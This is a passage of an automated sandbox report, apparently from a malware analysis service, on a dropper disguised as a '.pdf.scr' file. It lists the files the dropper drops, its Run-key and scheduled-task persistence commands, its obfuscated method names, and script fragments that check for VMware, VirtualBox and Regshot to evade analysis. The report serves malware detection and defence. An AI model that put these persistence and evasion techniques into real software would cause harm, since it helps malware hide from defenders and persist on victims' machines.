      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Boot Survival

      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: Possible double extension: pdf.scrStatic PE information: 026910003102350.pdf.scr.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003A25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_003A25A0
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0032FC8A
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: Yara match File source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESW
      Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEQ
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452549594.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452340975.00000000014C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")#
      Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXED
      Source: itugx.exe, 00000002.00000003.386800246.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.410540336.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400635217.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468989814.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
      Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")<
      Source: itugx.exe, 00000010.00000002.470477695.00000000013CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")44V$
      Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN?8CJ
      Source: itugx.exe, 00000019.00000003.565987603.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.565769789.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.563164824.0000000001959000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000002.569636959.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.567142794.000000000195C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp, wscript.exe, 0000001B.00000002.537175124.0000025B9CBDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533720665.0000025B9CBDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ORIGINALFILENAMEAUTORUNS.EXEL,
      Source: wscript.exe, 0000001B.00000002.536000753.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: LFILENAMEAUTORUNS.EXEL,
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEL~
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.369716492.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412647234.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENXJ\
      Source: itugx.exe, 00000005.00000003.452396525.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455207897.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451302859.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451585020.00000000014D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN-
      Source: itugx.exe, 00000010.00000002.470505280.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.469351165.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465307309.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467780564.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465193535.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.507346397.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509588017.00000000012C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
      Source: itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505153695.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509289794.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509361220.00000000012BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")L
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESUY;`D
      Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES.
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_2-94491
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904 Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904 Thread sleep count: 61 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748 Thread sleep count: 52 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748 Thread sleep count: 89 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1916 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028 Thread sleep count: 33 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028 Thread sleep count: 56 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4136 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916 Thread sleep count: 54 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916 Thread sleep count: 96 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460 Thread sleep count: 60 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460 Thread sleep count: 83 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596 Thread sleep count: 45 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596 Thread sleep count: 82 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920 Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920 Thread sleep count: 55 > 30
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Last function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 9667
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: foregroundWindowGot 455
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe API coverage: 5.3 %
      Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe API call chain: ExitProcess graph end node graph_0-25164
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then#
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then=
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Thena46
      Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe\Microso
      Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe65687
      Source: wscript.exe, 00000001.00000002.363558819.0000000002F60000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: en-USenVMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exe89
      Source: wscript.exe, 0000000D.00000002.421779421.000001EDEF160000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: tBC:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeipt.S
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: name="VMware.VMware.vmui"
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenj0
      Source: itugx.exe, 00000010.00000003.468344244.0000000001412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe^`DE$
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenk5q
      Source: wscript.exe, 00000016.00000002.491522356.0000021FFC240000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
      Source: itugx.exe, 00000017.00000003.539485403.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: wscript.exe, 00000001.00000003.361367465.00000000036F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exew
      Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe6BA444D6.
      Source: itugx.exe, 00000010.00000003.469045500.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe3A765687
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
      Source: itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exeS
      Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: <description>"VMware Workstation"</description>
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462893753.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468154413.000000000140E000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465422358.00000000013FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
      Source: itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exen*
      Source: wscript.exe, 0000001B.00000002.534995230.0000025B9C8D0000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------[
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe#
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
